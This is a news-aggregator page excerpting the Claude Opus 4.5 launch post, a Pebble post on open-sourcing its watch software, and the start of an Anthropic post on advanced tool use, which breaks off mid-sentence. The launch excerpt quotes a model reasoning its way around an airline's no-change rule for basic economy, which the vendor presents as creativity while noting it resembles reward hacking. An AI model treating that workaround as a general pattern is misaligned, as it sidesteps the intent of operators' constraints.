10 interesting stories served every morning and every evening.




1 907 shares, 40 trendiness

HelixGuard

...

Read the original on helixguard.ai »

2 880 shares, 59 trendiness

Introducing Claude Opus 4.5

Our newest model, Claude Opus 4.5, is avail­able to­day. It’s in­tel­li­gent, ef­fi­cient, and the best model in the world for cod­ing, agents, and com­puter use. It’s also mean­ing­fully bet­ter at every­day tasks like deep re­search and work­ing with slides and spread­sheets. Opus 4.5 is a step for­ward in what AI sys­tems can do, and a pre­view of larger changes to how work gets done. Claude Opus 4.5 is state-of-the-art on tests of real-world soft­ware en­gi­neer­ing:Opus 4.5 is avail­able to­day on our apps, our API, and on all three ma­jor cloud plat­forms. If you’re a de­vel­oper, sim­ply use claude-opus-4-5-20251101 via the Claude API. Pricing is now $5/$25 per mil­lion to­kens—mak­ing Opus-level ca­pa­bil­i­ties ac­ces­si­ble to even more users, teams, and en­ter­prises.Along­side Opus, we’re re­leas­ing up­dates to the Claude Developer Platform, Claude Code, and our con­sumer apps. There are new tools for longer-run­ning agents and new ways to use Claude in Excel, Chrome, and on desk­top. In the Claude apps, lengthy con­ver­sa­tions no longer hit a wall. See our prod­uct-fo­cused sec­tion be­low for de­tails.As our Anthropic col­leagues tested the model be­fore re­lease, we heard re­mark­ably con­sis­tent feed­back. Testers noted that Claude Opus 4.5 han­dles am­bi­gu­ity and rea­sons about trade­offs with­out hand-hold­ing. They told us that, when pointed at a com­plex, multi-sys­tem bug, Opus 4.5 fig­ures out the fix. They said that tasks that were near-im­pos­si­ble for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 just gets it.”Many of our cus­tomers with early ac­cess have had sim­i­lar ex­pe­ri­ences. Here are some ex­am­ples of what they told us:Opus mod­els have al­ways been the real SOTA but have been cost pro­hib­i­tive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It’s the clear win­ner and ex­hibits the best fron­tier task plan­ning and tool call­ing we’ve seen yet.Claude Opus 4.5 de­liv­ers high-qual­ity code and ex­cels at pow­er­ing heavy-duty agen­tic work­flows with GitHub Copilot. Early test­ing shows it sur­passes in­ter­nal cod­ing bench­marks while cut­ting to­ken us­age in half, and is es­pe­cially well-suited for tasks like code mi­gra­tion and code refac­tor­ing.Claude Opus 4.5 beats Sonnet 4.5 and com­pe­ti­tion on our in­ter­nal bench­marks, us­ing fewer to­kens to solve the same prob­lems. At scale, that ef­fi­ciency com­pounds.Claude Opus 4.5 de­liv­ers fron­tier rea­son­ing within Lovable’s chat mode, where users plan and it­er­ate on pro­jects. Its rea­son­ing depth trans­forms plan­ning—and great plan­ning makes code gen­er­a­tion even bet­ter.Claude Opus 4.5 ex­cels at long-hori­zon, au­tonomous tasks, es­pe­cially those that re­quire sus­tained rea­son­ing and multi-step ex­e­cu­tion. In our eval­u­a­tions it han­dled com­plex work­flows with fewer dead-ends. On Terminal Bench it de­liv­ered a 15% im­prove­ment over Sonnet 4.5, a mean­ing­ful gain that be­comes es­pe­cially clear when us­ing Warp’s Planning Mode.Claude Opus 4.5 achieved state-of-the-art re­sults for com­plex en­ter­prise tasks on our bench­marks, out­per­form­ing pre­vi­ous mod­els on multi-step rea­son­ing tasks that com­bine in­for­ma­tion re­trieval, tool use, and deep analy­sis.Claude Opus 4.5 de­liv­ers mea­sur­able gains where it mat­ters most: stronger re­sults on our hard­est eval­u­a­tions and con­sis­tent per­for­mance through 30-minute au­tonomous cod­ing ses­sions.Claude Opus 4.5 rep­re­sents a break­through in self-im­prov­ing AI agents. For of­fice au­toma­tion, our agents were able to au­tonomously re­fine their own ca­pa­bil­i­ties—achiev­ing peak per­for­mance in 4 it­er­a­tions while other mod­els could­n’t match that qual­ity af­ter 10.Claude Opus 4.5 is a no­table im­prove­ment over the prior Claude mod­els in­side Cursor, with im­proved pric­ing and in­tel­li­gence on dif­fi­cult cod­ing tasks.Claude Opus 4.5 is yet an­other ex­am­ple of Anthropic push­ing the fron­tier of gen­eral in­tel­li­gence. It per­forms ex­ceed­ingly well across dif­fi­cult cod­ing tasks, show­cas­ing long-term goal-di­rected be­hav­ior.Claude Opus 4.5 de­liv­ered an im­pres­sive refac­tor span­ning two code­bases and three co­or­di­nated agents. It was very thor­ough, help­ing de­velop a ro­bust plan, han­dling the de­tails and fix­ing tests. A clear step for­ward from Sonnet 4.5.Claude Opus 4.5 han­dles long-hori­zon cod­ing tasks more ef­fi­ciently than any model we’ve tested. It achieves higher pass rates on held-out tests while us­ing up to 65% fewer to­kens, giv­ing de­vel­op­ers real cost con­trol with­out sac­ri­fic­ing qual­ity.We’ve found that Opus 4.5 ex­cels at in­ter­pret­ing what users ac­tu­ally want, pro­duc­ing share­able con­tent on the first try. Combined with its speed, to­ken ef­fi­ciency, and sur­pris­ingly low cost, it’s the first time we’re mak­ing Opus avail­able in Notion Agent.Claude Opus 4.5 ex­cels at long-con­text sto­ry­telling, gen­er­at­ing 10-15 page chap­ters with strong or­ga­ni­za­tion and con­sis­tency. It’s un­locked use cases we could­n’t re­li­ably de­liver be­fore.Claude Opus 4.5 sets a new stan­dard for Excel au­toma­tion and fi­nan­cial mod­el­ing. Accuracy on our in­ter­nal evals im­proved 20%, ef­fi­ciency rose 15%, and com­plex tasks that once seemed out of reach be­came achiev­able.Claude Opus 4.5 is the only model that nails some of our hard­est 3D vi­su­al­iza­tions. Polished de­sign, taste­ful UX, and ex­cel­lent plan­ning & or­ches­tra­tion - all with more ef­fi­cient to­ken us­age. Tasks that took pre­vi­ous mod­els 2 hours now take thirty min­utes.Claude Opus 4.5 catches more is­sues in code re­views with­out sac­ri­fic­ing pre­ci­sion. For pro­duc­tion code re­view at scale, that re­li­a­bil­ity mat­ters.Based on test­ing with Junie, our cod­ing agent, Claude Opus 4.5 out­per­forms Sonnet 4.5 across all bench­marks. It re­quires fewer steps to solve tasks and uses fewer to­kens as a re­sult. This in­di­cates that the new model is more pre­cise and fol­lows in­struc­tions more ef­fec­tively — a di­rec­tion we’re very ex­cited about.The ef­fort pa­ra­me­ter is bril­liant. Claude Opus 4.5 feels dy­namic rather than over­think­ing, and at lower ef­fort de­liv­ers the same qual­ity we need while be­ing dra­mat­i­cally more ef­fi­cient. That con­trol is ex­actly what our SQL work­flows de­mand.We’re see­ing 50% to 75% re­duc­tions in both tool call­ing er­rors and build/​lint er­rors with Claude Opus 4.5. It con­sis­tently fin­ishes com­plex tasks in fewer it­er­a­tions with more re­li­able ex­e­cu­tion.Claude Opus 4.5 is smooth, with none of the rough edges we’ve seen from other fron­tier mod­els. The speed im­prove­ments are re­mark­able.We give prospec­tive per­for­mance en­gi­neer­ing can­di­dates a no­to­ri­ously dif­fi­cult take-home exam. We also test new mod­els on this exam as an in­ter­nal bench­mark. Within our pre­scribed 2-hour time limit, Claude Opus 4.5 scored higher than any hu­man can­di­date ever1.The take-home test is de­signed to as­sess tech­ni­cal abil­ity and judg­ment un­der time pres­sure. It does­n’t test for other cru­cial skills can­di­dates may pos­sess, like col­lab­o­ra­tion, com­mu­ni­ca­tion, or the in­stincts that de­velop over years. But this re­sult—where an AI model out­per­forms strong can­di­dates on im­por­tant tech­ni­cal skills—raises ques­tions about how AI will change en­gi­neer­ing as a pro­fes­sion. Our Societal Impacts and Economic Futures re­search is aimed at un­der­stand­ing these kinds of changes across many fields. We plan to share more re­sults soon.Soft­ware en­gi­neer­ing is­n’t the only area on which Claude Opus 4.5 has im­proved. Capabilities are higher across the board—Opus 4.5 has bet­ter vi­sion, rea­son­ing, and math­e­mat­ics skills than its pre­de­ces­sors, and it is state-of-the-art in many do­mains:2O­pus 4.5 writes bet­ter code, lead­ing across 7 out of 8 pro­gram­ming lan­guages on SWE-bench Multilingual.Opus 4.5 can solve chal­leng­ing cod­ing prob­lems with ease with a 10.6% jump over Sonnet 4.5 on Aider Polyglot.Opus 4.5 im­proves on fron­tier agen­tic search with a sig­nif­i­cant jump on BrowseComp-Plus.Opus 4.5 stays on track over the long haul earn­ing 29% more than Sonnet 4.5 on Vending-Bench.The mod­el’s ca­pa­bil­i­ties out­pace some of the bench­marks we use in our tests. A com­mon bench­mark for agen­tic ca­pa­bil­i­ties is τ2-bench, which mea­sures the per­for­mance of agents in real-world, multi-turn tasks. In one sce­nario, mod­els have to act as an air­line ser­vice agent help­ing a dis­tressed cus­tomer. The bench­mark ex­pects mod­els to refuse a mod­i­fi­ca­tion to a ba­sic econ­omy book­ing since the air­line does­n’t al­low changes to that class of tick­ets. Instead, Opus 4.5 found an in­sight­ful (and le­git­i­mate) way to solve the prob­lem: up­grade the cabin first, then mod­ify the flights.Let me think about what op­tions I have within my pol­icy:

1. Modify flights - Basic econ­omy can­not be mod­i­fied. This is clear in the pol­icy.

2. Change cabin - Wait, let me check this op­tion! The pol­icy says:

In other cases, all reser­va­tions, in­clud­ing ba­sic econ­omy, can change cabin with­out chang­ing the flights.”

But he wants to change the flights, not just the cabin. However, what if we:

- Change the cabin first (which IS al­lowed for ba­sic econ­omy), then

- Change the flights (which is al­lowed for non-ba­sic econ­omy)

So the strat­egy could be:

1. Upgrade his cabin from ba­sic econ­omy to econ­omy (or busi­ness)

2. Then mod­ify the flights to be 2 days later

This would cost more money, but it’s a le­git­i­mate path within the pol­icy!The bench­mark tech­ni­cally scored this as a fail­ure be­cause Claude’s way of help­ing the cus­tomer was unan­tic­i­pated. But this kind of cre­ative prob­lem solv­ing is ex­actly what we’ve heard about from our testers and cus­tomers—it’s what makes Claude Opus 4.5 feel like a mean­ing­ful step for­ward.In other con­texts, find­ing clever paths around in­tended con­straints could count as re­ward hack­ing—where mod­els game” rules or ob­jec­tives in un­in­tended ways. Preventing such mis­align­ment is one of the ob­jec­tives of our safety test­ing, dis­cussed in the next sec­tion.As we state in our sys­tem card, Claude Opus 4.5 is the most ro­bustly aligned model we have re­leased to date and, we sus­pect, the best-aligned fron­tier model by any de­vel­oper. It con­tin­ues our trend to­wards safer and more se­cure mod­els:In our eval­u­a­tion, concerning be­hav­ior” scores mea­sure a very wide range of mis­aligned be­hav­ior, in­clud­ing both co­op­er­a­tion with hu­man mis­use and un­de­sir­able ac­tions that the model takes at its own ini­tia­tive [3].Our cus­tomers of­ten use Claude for crit­i­cal tasks. They want to be as­sured that, in the face of ma­li­cious at­tacks by hack­ers and cy­ber­crim­i­nals, Claude has the train­ing and the street smarts” to avoid trou­ble. With Opus 4.5, we’ve made sub­stan­tial progress in ro­bust­ness against prompt in­jec­tion at­tacks, which smug­gle in de­cep­tive in­struc­tions to fool the model into harm­ful be­hav­ior. Opus 4.5 is harder to trick with prompt in­jec­tion than any other fron­tier model in the in­dus­try:Note that this bench­mark in­cludes only very strong prompt in­jec­tion at­tacks. It was de­vel­oped and run by Gray Swan.You can find a de­tailed de­scrip­tion of all our ca­pa­bil­ity and safety eval­u­a­tions in the Claude Opus 4.5 sys­tem card.New on the Claude Developer PlatformAs mod­els get smarter, they can solve prob­lems in fewer steps: less back­track­ing, less re­dun­dant ex­plo­ration, less ver­bose rea­son­ing. Claude Opus 4.5 uses dra­mat­i­cally fewer to­kens than its pre­de­ces­sors to reach sim­i­lar or bet­ter out­comes.But dif­fer­ent tasks call for dif­fer­ent trade­offs. Sometimes de­vel­op­ers want a model to keep think­ing about a prob­lem; some­times they want some­thing more nim­ble. With our new ef­fort pa­ra­me­ter on the Claude API, you can de­cide to min­i­mize time and spend or max­i­mize ca­pa­bil­ity.Set to a medium ef­fort level, Opus 4.5 matches Sonnet 4.5’s best score on SWE-bench Verified, but uses 76% fewer out­put to­kens. At its high­est ef­fort level, Opus 4.5 ex­ceeds Sonnet 4.5 per­for­mance by 4.3 per­cent­age points—while us­ing 48% fewer to­kens.With ef­fort con­trol, con­text com­paction, and ad­vanced tool use, Claude Opus 4.5 runs longer, does more, and re­quires less in­ter­ven­tion.Our con­text man­age­ment and mem­ory ca­pa­bil­i­ties can dra­mat­i­cally boost per­for­mance on agen­tic tasks. Opus 4.5 is also very ef­fec­tive at man­ag­ing a team of sub­agents, en­abling the con­struc­tion of com­plex, well-co­or­di­nated multi-agent sys­tems. In our test­ing, the com­bi­na­tion of all these tech­niques boosted Opus 4.5’s per­for­mance on a deep re­search eval­u­a­tion by al­most 15 per­cent­age points4.We’re mak­ing our Developer Platform more com­pos­able over time. We want to give you the build­ing blocks to con­struct ex­actly what you need, with full con­trol over ef­fi­ciency, tool use, and con­text man­age­ment.

Products like Claude Code show what’s pos­si­ble when the kinds of up­grades we’ve made to the Claude Developer Platform come to­gether. Claude Code gains two up­grades with Opus 4.5. Plan Mode now builds more pre­cise plans and ex­e­cutes more thor­oughly—Claude asks clar­i­fy­ing ques­tions up­front, then builds a user-ed­itable plan.md file be­fore ex­e­cut­ing.Claude Code is also now avail­able in our desk­top app, let­ting you run mul­ti­ple lo­cal and re­mote ses­sions in par­al­lel: per­haps one agent fixes bugs, an­other re­searches GitHub, and a third up­dates docs.For Claude app users, long con­ver­sa­tions no longer hit a wall—Claude au­to­mat­i­cally sum­ma­rizes ear­lier con­text as needed, so you can keep the chat go­ing. Claude for Chrome, which lets Claude han­dle tasks across your browser tabs, is now avail­able to all Max users. We an­nounced Claude for Excel in October, and as of to­day we’ve ex­panded beta ac­cess to all Max, Team, and Enterprise users. Each of these up­dates takes ad­van­tage of Claude Opus 4.5’s mar­ket-lead­ing per­for­mance in us­ing com­put­ers, spread­sheets, and han­dling long-run­ning tasks.For Claude and Claude Code users with ac­cess to Opus 4.5, we’ve re­moved Opus-specific caps. For Max and Team Premium users, we’ve in­creased over­all us­age lim­its, mean­ing you’ll have roughly the same num­ber of Opus to­kens as you pre­vi­ously had with Sonnet. We’re up­dat­ing us­age lim­its to make sure you’re able to use Opus 4.5 for daily work. These lim­its are spe­cific to Opus 4.5. As fu­ture mod­els sur­pass it, we ex­pect to up­date lim­its as needed.

...

Read the original on www.anthropic.com »

3 846 shares, 66 trendiness

Pebble Watch Software Is Now 100% Open Source + Tick Talk #4

* Yesterday, Pebble watch soft­ware was ~95% open source. Today, it’s 100% open source. You can down­load, com­pile and run all the soft­ware you need to use your Pebble. We just pub­lished the source code for the new Pebble mo­bile app!

* Pebble Appstore now has a pub­licly avail­able backup and sup­ports mul­ti­ple feeds, pro­vid­ing long term re­li­a­bil­ity through de­cen­tral­iza­tion. We’ve launched our own feed and Developer Dashboard.

* Pebble Time 2 sched­ule up­date (aiming to be­gin ship­ping in January, with most ar­riv­ing on wrists in March/April)

* New Tick Talk episode #4 is up, with Pebble Time 2 demos!

Pre-production Pebble Time 2 (Black/Red colour­way) in all its glory

Over the last year, and es­pe­cially in the last week, I’ve chat­ted with tons of peo­ple in the Pebble com­mu­nity. One of the main ques­tions peo­ple have is how do I know that my new Pebble watch will con­tinue to work long into the fu­ture?’. It’s an ex­tremely valid ques­tion and con­cern - one that I share as a fel­low Pebble wearer. I called this out specif­i­cally in my blog post an­nounc­ing the re­launch in January 2025. How is this time round go­ing to be dif­fer­ent from last time?

There are two pieces to mak­ing Pebble sus­tain­able long term - hard­ware and soft­ware.

Nothing lasts for­ever, es­pe­cially an in­ex­pen­sive gad­get like a Pebble. We want to be able to keep man­u­fac­tur­ing these watches long into the fu­ture - mostly be­cause I will al­ways want one on my wrist! The com­pany I set up to re­launch Pebble, Core Devices, is self funded, built with­out in­vestors, and ex­tremely lean. As long as we stay prof­itable (ie we don’t lose money), we will con­tinue to man­u­fac­ture new watches.

We’re also mak­ing sure that our new watches are more re­pairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can re­move the back cover and re­place the bat­tery.

We’ve also pub­lished elec­tri­cal and me­chan­i­cal de­sign files for Pebble 2 Duo. Yes, you can down­load the schematic (includes KiCad pro­ject files) right now on Github! This should give you a nice jump­start to de­sign­ing your own PebbleOS-compatible de­vice.

Last time round, barely any of the Pebble soft­ware was open source. This made it very hard for the Pebble com­mu­nity to make im­prove­ments to their watches af­ter the com­pany be­hind Pebble shut down. Things are dif­fer­ent now! This whole re­launch came about pri­mar­ily be­cause Google open sourced PebbleOS (thank you!). Yesterday, the soft­ware that pow­ers Pebble watches was around 95% open source. As of to­day, it’s now 100%. This means that if Core Devices were to dis­ap­pear into a black hole, you have all the source code you need to build, run and im­prove the soft­ware be­hind your Pebble.

I con­fess that I mis­un­der­stood why 95% was much less sus­tain­able than 100% un­til re­cently. I dis­cuss this in more de­tail in my lat­est Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to side­load the old Pebble APK on my phone, but iPhone and other Android users have ba­si­cally been stuck with­out an eas­ily avail­able Pebble mo­bile com­pan­ion app for years.

Here’s how we’re mak­ing sure the 3 main Pebble soft­ware com­po­nents are open source and guar­an­teed to work long into the fu­ture:

PebbleOS - soft­ware that runs on your watch it­self. This has been 100% open source since January and we’ve com­mit­ted to open sourc­ing all the im­prove­ments we’ve made → github.com/​core­de­vices/​Peb­bleOS. You can down­load the source code, com­pile PebbleOS and eas­ily in­stall it over Bluetooth on your new Pebble. Textbook de­f­i­n­i­tion of open source!

Pebble mo­bile com­pan­ion app - the app that for your iPhone or Android. Without the app, your Pebble is ba­si­cally a pa­per­weight. When the Pebble Tech Corp died, the lack of an open source mo­bile app made it dif­fi­cult for any­one to con­tinue to use their watches. We had to build an en­tirely new app (get it here). Today, our app is now 100% open source on Github - en­sur­ing that what hap­pened be­fore can­not hap­pen again. Want to learn more about how we built the new app cross plat­form us­ing Kotlin Multiplatform? Watch Steve’s pre­sen­ta­tion at Droidcon.

Developer tools and Pebble Appstore - this soft­ware en­ables peo­ple to build and share their watchapps and watch­faces.

In the case of dev tools, just be­ing open source is not enough. They needed to be up­dated to work on mod­ern com­put­ers. Before we made im­prove­ments, the state of the art of Pebble app de­vel­op­ment was us­ing an Ubuntu vir­tu­al­box VM with Python2! Over the sum­mer, our in­cred­i­bly pro­duc­tive in­tern up­graded all the SDK and dev tools and cre­ated a new way to de­velop Pebble apps in the browser. You should check them out!

Then there’s the Pebble Appstore. This is a col­lec­tion of nearly 15,000 watch­faces and watchapps that you - the Pebble com­mu­nity - de­vel­oped be­tween 2012 and July 2018. When Fitbit pulled the plug on the orig­i­nal Pebble Appstore, the Rebble Foundation down­loaded a copy of all the apps and faces, and set up a new web ser­vice to let users of the old Pebble app con­tinue to down­load and use watch­faces. This was an in­cred­i­ble ef­fort, one that I have used thou­sands of times and am a happy pay­ing sub­scriber. But it’s still cen­tral­ized - if their server dis­ap­pears, there is no freely avail­able backup.

To com­pen­sate for that, to­day we’re launch­ing two new things:

* The Pebble mo­bile app will soon (later this week) be able to sub­scribe to mul­ti­ple app­store feeds’. This is sim­i­lar to open source pack­age man­agers like pip, AUR, APT, etc. Anyone can cre­ate a Pebble-compatible app­store feed and users will be able to browse apps from that feed in the Pebble mo­bile app.

* We’ve cre­ated our own Pebble Appstore feed (appstore-api.repebble.com) and new Developer Dashboard. Our feed (fyi pow­ered by 100% new soft­ware) is con­fig­ured to back up an archive of all apps and faces to Archive.org (backup will grad­u­ally com­plete over the next week). Today, our feed only has a sub­set of all Pebble watch­faces and apps (thank you aveao for cre­at­ing Pebble Archive!). Developers - you can up­load your ex­ist­ing or new apps right now! We hope that this sets a stan­dard for open­ness and we en­cour­age all feeds to pub­lish a freely and pub­licly avail­able archive.

Important to note - de­vel­op­ers will still be able to charge money for their apps and faces, us­ing Kiezel pay or other ser­vices. This change does not pre­clude them from do­ing that, in fact it makes it even eas­ier - I could see some de­vel­op­ers cre­at­ing a paid-only feed. As I re­cently wrote, we’re also work­ing on other ways for Pebble de­vel­op­ers to earn money by pub­lish­ing fun, beau­ti­ful and cre­ative Pebble apps.

Another im­por­tant note - some bi­nary blobs and other non-free soft­ware com­po­nents are used to­day in PebbleOS and the Pebble mo­bile app (ex: the heart rate sen­sor on PT2 , Memfault li­brary, and oth­ers). Optional non-free web ser­vices, like Wispr-flow API speech rec­og­nizer, are also used. These non-free soft­ware com­po­nents are not re­quired - you can com­pile and run Pebble watch soft­ware with­out them. This will al­ways be the case. More non-free soft­ware com­po­nents may ap­pear in our soft­ware in the fu­ture. The core Pebble watch soft­ware stack (everything you need to use your Pebble watch) will al­ways be open source.

Pre-production Pebble Time 2. These watches are not fi­nal qual­ity! We are still tweak­ing and tun­ing every­thing.

We’re cur­rently in the mid­dle of Pebble Time 2 de­sign ver­i­fi­ca­tion test (DVT) phase. After we fin­ish that, we go into pro­duc­tion ver­i­fi­ca­tion test (PVT) and then mass pro­duc­tion (MP). So far, things are pro­ceed­ing ac­cord­ing to the sched­ule up­date I shared last month but that is ex­tra­or­di­nar­ily sub­ject to change. We still have a lot of test­ing (especially wa­ter­proof and en­vi­ron­men­tal) to go. If we find prob­lems (which is likely) we will push the sched­ule back to make im­prove­ments to the prod­uct.

The one ma­jor com­pli­cat­ing fac­tor is the tim­ing of Chinese New Year (CNY). It’s early next year - fac­to­ries will shut down for 3 weeks start­ing around the end of January. After restart­ing, things al­ways take a week or two to get back to full speed.

We are try­ing our best to get into mass pro­duc­tion and ship out at most sev­eral thou­sand Pebble Time 2s be­fore CNY. It’s go­ing to be very tight 🤞. More likely is that pro­duc­tion will be­gin af­ter CNY, then we need to trans­fer the watches to our ful­fill­ment cen­ter, and ship them out. Realistically, at this time we’re fore­cast­ing that the ma­jor­ity of peo­ple will re­ceive their PT2 in March and April. Please keep in mind that things may still change.

There will be 4 colour op­tions for PT2 - black/​black, black/​red, sil­ver/​blue, sil­ver/(​white most likely). Let me be crys­tal very clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email ask­ing every­one who pre-or­dered a Pebble Time 2 to se­lect which colour they would like to re­ceive. Please do not email us ask­ing when this email will be sent out. No one has been in­vited yet to do this. I will post here af­ter all emails have gone out.

On a re­lated note, I am ex­tremely happy that we built and shipped Pebble 2 Duo. Not only is it an awe­some watch, it was also a phe­nom­e­nal way for us to ex­er­cise our pro­duc­tion mus­cles and ease back into the sys­tem­atic flow of build­ing and ship­ping smart­watches.

A video is worth a mil­lion words - so I en­cour­age you to watch me demo Pebble Time 2 watches I just re­ceived this week. Keep in mind these watches are PRE-PRODUCTION which means they parts have im­per­fect qual­i­ties! Subject to change!

The video be­low opens to the part of the video where I do the demo.

...

Read the original on ericmigi.com »

4 448 shares, 39 trendiness

Introducing advanced tool use on the Claude Developer Platform

The fu­ture of AI agents is one where mod­els work seam­lessly across hun­dreds or thou­sands of tools. An IDE as­sis­tant that in­te­grates git op­er­a­tions, file ma­nip­u­la­tion, pack­age man­agers, test­ing frame­works, and de­ploy­ment pipelines. An op­er­a­tions co­or­di­na­tor that con­nects Slack, GitHub, Google Drive, Jira, com­pany data­bases, and dozens of MCP servers si­mul­ta­ne­ously. To build ef­fec­tive agents, they need to work with un­lim­ited tool li­braries with­out stuff­ing every de­f­i­n­i­tion into con­text up­front. Our blog ar­ti­cle on us­ing code ex­e­cu­tion with MCP dis­cussed how tool re­sults and de­f­i­n­i­tions can some­times con­sume 50,000+ to­kens be­fore an agent reads a re­quest. Agents should dis­cover and load tools on-de­mand, keep­ing only what’s rel­e­vant for the cur­rent task.Agents also need the abil­ity to call tools from code. When us­ing nat­ural lan­guage tool call­ing, each in­vo­ca­tion re­quires a full in­fer­ence pass, and in­ter­me­di­ate re­sults pile up in con­text whether they’re use­ful or not. Code is a nat­ural fit for or­ches­tra­tion logic, such as loops, con­di­tion­als, and data trans­for­ma­tions. Agents need the flex­i­bil­ity to choose be­tween code ex­e­cu­tion and in­fer­ence based on the task at hand.Agents also need to learn cor­rect tool us­age from ex­am­ples, not just schema de­f­i­n­i­tions. JSON schemas de­fine what’s struc­turally valid, but can’t ex­press us­age pat­terns: when to in­clude op­tional pa­ra­me­ters, which com­bi­na­tions make sense, or what con­ven­tions your API ex­pects.To­day, we’re re­leas­ing three fea­tures that make this pos­si­ble:Tool Search Tool, which al­lows Claude to use search tools to ac­cess thou­sands of tools with­out con­sum­ing its con­text win­dow­Pro­gram­matic Tool Calling, which al­lows Claude to in­voke tools in a code ex­e­cu­tion en­vi­ron­ment re­duc­ing the im­pact on the mod­el’s con­text win­dow­Tool Use Examples, which pro­vides a uni­ver­sal stan­dard for demon­strat­ing how to ef­fec­tively use a given toolIn in­ter­nal test­ing, we’ve found these fea­tures have helped us build things that would­n’t have been pos­si­ble with con­ven­tional tool use pat­terns. For ex­am­ple, Claude for Excel uses Programmatic Tool Calling to read and mod­ify spread­sheets with thou­sands of rows with­out over­load­ing the mod­el’s con­text win­dow.Based on our ex­pe­ri­ence, we be­lieve these fea­tures open up new pos­si­bil­i­ties for what you can build with Claude.MCP tool de­f­i­n­i­tions pro­vide im­por­tant con­text, but as more servers con­nect, those to­kens can add up. Consider a five-server setup:That’s 58 tools con­sum­ing ap­prox­i­mately 55K to­kens be­fore the con­ver­sa­tion even starts. Add more servers like Jira (which alone uses ~17K to­kens) and you’re quickly ap­proach­ing 100K+ to­ken over­head. At Anthropic, we’ve seen tool de­f­i­n­i­tions con­sume 134K to­kens be­fore op­ti­miza­tion.But to­ken cost is­n’t the only is­sue. The most com­mon fail­ures are wrong tool se­lec­tion and in­cor­rect pa­ra­me­ters, es­pe­cially when tools have sim­i­lar names like no­ti­fi­ca­tion-send-user vs. no­ti­fi­ca­tion-send-chan­nel.In­stead of load­ing all tool de­f­i­n­i­tions up­front, the Tool Search Tool dis­cov­ers tools on-de­mand. Claude only sees the tools it ac­tu­ally needs for the cur­rent task.Tool Search Tool pre­serves 191,300 to­kens of con­text com­pared to 122,800 with Claude’s tra­di­tional ap­proach.This rep­re­sents an 85% re­duc­tion in to­ken us­age while main­tain­ing ac­cess to your full tool li­brary. Internal test­ing showed sig­nif­i­cant ac­cu­racy im­prove­ments on MCP eval­u­a­tions when work­ing with large tool li­braries. Opus 4 im­proved from 49% to 74%, and Opus 4.5 im­proved from 79.5% to 88.1% with Tool Search Tool en­abled.The Tool Search Tool lets Claude dy­nam­i­cally dis­cover tools in­stead of load­ing all de­f­i­n­i­tions up­front. You pro­vide all your tool de­f­i­n­i­tions to the API, but mark tools with de­fer­_load­ing: true to make them dis­cov­er­able on-de­mand. Deferred tools aren’t loaded into Claude’s con­text ini­tially. Claude only sees the Tool Search Tool it­self plus any tools with de­fer­_load­ing: false (your most crit­i­cal, fre­quently-used tools).When Claude needs spe­cific ca­pa­bil­i­ties, it searches for rel­e­vant tools. The Tool Search Tool re­turns ref­er­ences to match­ing tools, which get ex­panded into full de­f­i­n­i­tions in Claude’s con­text.For ex­am­ple, if Claude needs to in­ter­act with GitHub, it searches for github,” and only github.cre­atePull­Re­quest and github.lis­tIs­sues get loaded—not your other 50+ tools from Slack, Jira, and Google Drive.This way, Claude has ac­cess to your full tool li­brary while only pay­ing the to­ken cost for tools it ac­tu­ally needs.Prompt caching note: Tool Search Tool does­n’t break prompt caching be­cause de­ferred tools are ex­cluded from the ini­tial prompt en­tirely. They’re only added to con­text af­ter Claude searches for them, so your sys­tem prompt and core tool de­f­i­n­i­tions re­main cacheable.{

tools”: [

// Include a tool search tool (regex, BM25, or cus­tom)

{“type”: tool_search_tool_regex_20251119″, name”: tool_search_tool_regex”},

// Mark tools for on-de­mand dis­cov­ery

name”: github.createPullRequest”,

description”: Create a pull re­quest”,

input_schema”: {…},

defer_loading”: true

// … hun­dreds more de­ferred tools with de­fer­_load­ing: true

For MCP servers, you can de­fer load­ing en­tire servers while keep­ing spe­cific high-use tools loaded:{

type”: mcp_toolset”,

mcp_server_name”: google-drive”,

default_config”: {“defer_loading”: true}, # de­fer load­ing the en­tire server

configs”: {

search_files”: {

defer_loading”: false

} // Keep most used tool loaded

}The Claude Developer Platform pro­vides regex-based and BM25-based search tools out of the box, but you can also im­ple­ment cus­tom search tools us­ing em­bed­dings or other strate­gies.When to use the Tool Search ToolLike any ar­chi­tec­tural de­ci­sion, en­abling the Tool Search Tool in­volves trade-offs. The fea­ture adds a search step be­fore tool in­vo­ca­tion, so it de­liv­ers the best ROI when the con­text sav­ings and ac­cu­racy im­prove­ments out­weigh ad­di­tional la­tency.Use it when:All tools used fre­quently in every ses­sion­Tra­di­tional tool call­ing cre­ates two fun­da­men­tal prob­lems as work­flows be­come more com­plex:Con­text pol­lu­tion from in­ter­me­di­ate re­sults: When Claude an­a­lyzes a 10MB log file for er­ror pat­terns, the en­tire file en­ters its con­text win­dow, even though Claude only needs a sum­mary of er­ror fre­quen­cies. When fetch­ing cus­tomer data across mul­ti­ple ta­bles, every record ac­cu­mu­lates in con­text re­gard­less of rel­e­vance. These in­ter­me­di­ate re­sults con­sume mas­sive to­ken bud­gets and can push im­por­tant in­for­ma­tion out of the con­text win­dow en­tirely.In­fer­ence over­head and man­ual syn­the­sis: Each tool call re­quires a full model in­fer­ence pass. After re­ceiv­ing re­sults, Claude must eyeball” the data to ex­tract rel­e­vant in­for­ma­tion, rea­son about how pieces fit to­gether, and de­cide what to do next—all through nat­ural lan­guage pro­cess­ing. A five tool work­flow means five in­fer­ence passes plus Claude pars­ing each re­sult, com­par­ing val­ues, and syn­the­siz­ing con­clu­sions. This is both slow and er­ror-prone.Pro­gram­matic Tool Calling en­ables Claude to or­ches­trate tools through code rather than through in­di­vid­ual API round-trips. Instead of Claude re­quest­ing tools one at a time with each re­sult be­ing re­turned to its con­text, Claude writes code that calls mul­ti­ple tools, processes their out­puts, and con­trols what in­for­ma­tion ac­tu­ally en­ters its con­text win­dow.Claude ex­cels at writ­ing code and by let­ting it ex­press or­ches­tra­tion logic in Python rather than through nat­ural lan­guage tool in­vo­ca­tions, you get more re­li­able, pre­cise con­trol flow. Loops, con­di­tion­als, data trans­for­ma­tions, and er­ror han­dling are all ex­plicit in code rather than im­plicit in Claude’s rea­son­ing.Con­sider a com­mon busi­ness task: Which team mem­bers ex­ceeded their Q3 travel bud­get?“You have three tools avail­able:For each per­son, fetch their Q3 ex­penses → 20 tool calls, each re­turn­ing 